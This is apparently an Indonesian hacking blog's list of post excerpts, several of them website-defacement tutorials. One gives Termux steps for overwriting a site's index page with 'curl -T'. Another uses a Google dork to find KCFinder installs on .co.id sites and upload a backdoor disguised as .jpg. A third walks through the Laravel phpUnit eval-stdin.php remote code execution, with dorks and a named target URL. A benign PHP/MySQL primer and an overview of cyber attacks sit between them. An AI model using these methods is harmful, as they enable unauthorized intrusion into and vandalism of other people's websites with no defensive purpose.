Mr.TUKEN

HELLO ALL ^_^ KAMI AKAN MENSHARE CARA DEFACE DENGAN TERMUX Bahan bahan -dork vuln -termux (ada di playstore) Cara untuk pasang curl -apt upgrade -apt update -pkg install curl Pindahkan script kalian di penyimpanan internal dan jangan di folder letak kan di luar Sesudah itu lalu ketikan Liat target nya home nya di index.html atau di index.htm Cara nya tinggal nambah di belakang url www.target.co.za menjadi www.target.co.za/index.html atau /index.htm Lalu ketikan curl -T /storage/emulated/0/index.html TARGET Contoh:curl -T /storage/emulated/0/index.html www.nicestuff.co.za

Cara Belajar Bahasa Pemrograman PHP dan MySQL         halo sobat , Mr.TUKEN di sini  Bersyukur masih di beri kesempatan sama tuhan untuk berbagi materi dengan sobat Setia semuanya kali ini saya mau ngasih materi Cara Belajar Bahasa Pemrograman PHP dan MySQL        nah PHP merupakan salah satu bahasa pemrograman yang paling banyak digunakan dalam internet, yang mana memungkinkan Anda untuk melakukan banyak hal dan lebih mudah daripada HTML. MySQL memungkinkan Anda untuk membuat dan merubah database pada server Anda. Dengan menggunakan keduanya, Anda akan bisa membuat situs dan database yang jauh lebih kompleks dan juga lebih baik. Banyak yang harus Anda pelajari untuk mampu menguasai PHP dan MySQL dengan baik, namun Anda dapat mempelajari dasarnya dengan mudah pada artikel ini. Bagian 1 dari 5: Persiapan  1.Mengerti apa itu PHP dan MySQL. PHP merupakan bahasa pemrograman yang dapat Anda gunakan u...

Perkembangan dunia internet yang semakin pesat dan sangat dibutuhkan pada saat ini, memiliki dampak yang memunculkan para jenius teknologi mengembangkan serangan dunia maya atau Cyber Attack. Serangan melalui dunia maya ini makin dikenal masyarakat awam ketika marak munculnya jenis serangan Wanna Cry yang melibatkan perusahaan besar di dunia sebagai korban pemerasan. Pengertian Serangan Cyber Serangan cyber adalah eksploitasi yang disengaja terhadap sistem komputer. Serangan ini biasanya ditujukan pada perusahaan besar yang bergantung pada teknologi dan jaringan. Serangan ini menggunakan kode yang dapat mengubah kode komputer, logika atau data yang mengakibatkan konsekuensi yang mengganggu serta membahayakan data. Serangan cyber ini disebut juga serangan pencurian data, informasi dan identitas, karena tujuan para penyerang adalah menukarkan data dengan sejumlah uang. Serangan cyber dipecah menjadi dua jenis besar tergantung pada tujuan penyerang. Pertama adalah ...

KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di   http://kcfinder.sunhater.com  untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini. Bagaimana cara dapatnya? Simpel saja, saya gunakan mata omm google yang tembus pandang untuk melihat target. Google dorknya inurl: index of/kcfinder/browse.php site:.co.id Di atas hanya contoh ya… setelah itu, kita tinggal upload file backdoornya. Sebagian server memproteksi dengan mereject file PHP. Jadi kita main kucing-kucingan saja. Itu file backdoor kita ganti ekstensinya dari .php ke .jpg atau .php3. Tapi yang ...

Tutorial deface POC Laravel phpUnit UPLOAD SHELV Setelah sekian lama kami tidak update seputar deface kali ini kami akan berbagi tutorial tentang  Laravel phpUnit UPLOAD SHELL.        Teknik yang satu ini memanfaatkan sebuah bug dari Fitur yang di sediakan oleh pengguna laravel yaitu php unit dengan cara menggunakan remote code execution (RCE) Tutorial / Cara Upload Shell Metode Laravel phpUnit to RCE( Remote Code Execution ) dengan BurpSuite Pertama siapkan : - BurpSuite ( download di google banyak ) - Browser Dorking di google : - inurl:vendor/phpunit/phpunit/src/ - inurl:/src/Util/PHP/ intitle:index of - inurl:/Util/PHP/ "eval-stdin.php" * kembangin lagi biar dapet target lebih fresh Exploit : /eval-stdin.php site.co.li/vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php * kalau blank putih berarti vuln Oke langsung aja, disini gua udh dapet targetnya : http://www.olapcemetery.com//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin...